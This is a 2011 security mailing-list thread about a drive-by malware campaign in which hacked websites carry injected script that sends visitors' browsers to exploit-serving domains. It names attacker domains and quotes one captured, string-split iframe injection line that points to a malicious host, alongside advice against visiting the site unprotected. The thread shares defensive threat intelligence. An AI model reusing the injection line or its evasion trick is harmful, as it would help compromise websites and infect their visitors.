RE: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack!

["Kropotov, Vladimir B." <vbkropotov () tnk-bp com>]

Hello list.
Because this problem seemed to be global, my 2 cents..

This activity was found using IBM ISS about 1 month ago.
Attack scheme:
A) Participants
Site with malware (1) 
Hacked Site (2) 
User host with browser (3)

b) Actions (source, target, action)
b1. (1) - > (2) -> script injection
b2. (2) - > (3) -> script execution
b3. (3) -> (1) -> exploit download
b4. (3) -> (3) - > exploit execution with rights of current user

c) what we know about:
(1) just registered to faked person
(1) has lifetime about 1 week
(1) moves from old to new domains
(1) some domains appear in blacklist, but after their lifetime
(1) domain samples inaptly.in, unaropanda.in, sonorophone.in, etc.,
known domains ~100
(1) at the time of first appearance, the majority of domains was hosted
in Romania, now in USA 
(2) Usual sites, which are possibly use the same management system, but
may be not...
(3) Knows nothing about possible malicious content on (2)
(1)(2) in the beginning of aug we found some signatures, where exploit
was located on the hacked site, but during the time scheme moved to b)
b1. Nothing, we not control internet 
b2. In current scheme attackers employs IDS evasion technique. Here's
the sample we catch: script
document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd
2/08.p'+'hp';
b3. It looks like loaded exploit depends on user environment. Script
(the sample we catch) checks OS (Win, FreeBSD,Mac, iPhone, Linux,
etc...), browser and browser version (IE, Gecko, Opera, Safari, Chrome,
etc.), browser plugins, ActiveX enabled or not, ShockwaveFlash,
wmplayer, Adobe Reader, etc....
 
If someone would like to continue - it will be useful for all!


regards
Vladimir B. Kropotov
Information Security Department

TNK-BP.com



-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
On Behalf Of Henri Salo
Sent: Thursday, September 08, 2011 8:12 PM
To: charlie () funkymunkey com
Cc: security-basics () securityfocus com; shervin () debug ir
Subject: Re: There is a strange get request header in all web pages of
my site? I'm worry about Trojan attack!

On Thu, Sep 08, 2011 at 09:51:42AM +0100, charlie () funkymunkey com wrote:
> That's isn't 'a' header, its a whole GET request and response. I'm
> assuming there is a bit of javascript that appears on every page of
> your site that makes the browser send this GET request. The best
> option would be to load up your website in a browser and look
> through the code or look through the code on the web server and find
> out where that request is coming from.
> At least you can be sure that nothing malicious is going on from
> your website as this request is met by a 404 meaning that the
> supposed malicious script does not exist.

No he should NOT go there using normal browser. If this is drive-by
attack URL might get to be alive and he would get infected. At least I
suggest him to disable javascript, but that might not help if URL is
using other attack vector like vulnerability of PDF-reader or browser. I
would like to investigate this issue, but I haven't received URL to the
web-site even I requested it.

Best regards,
Henri Salo

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an
SSL certificate.  We look at how SSL works, how it benefits your company
and how your customers can tell if a site is secure. You will find out
how to test, purchase, install and use a thawte Digital Certificate on
your Apache web server. Throughout, best practices for set-up are
highlighted to help you ensure efficient ongoing management of your
encryption keys and digital certificates.

http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442
f727d1
------------------------------------------------------------------------


------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate.  We look at how SSL works, how 
it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, 
install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are 
highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates.

http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
------------------------------------------------------------------------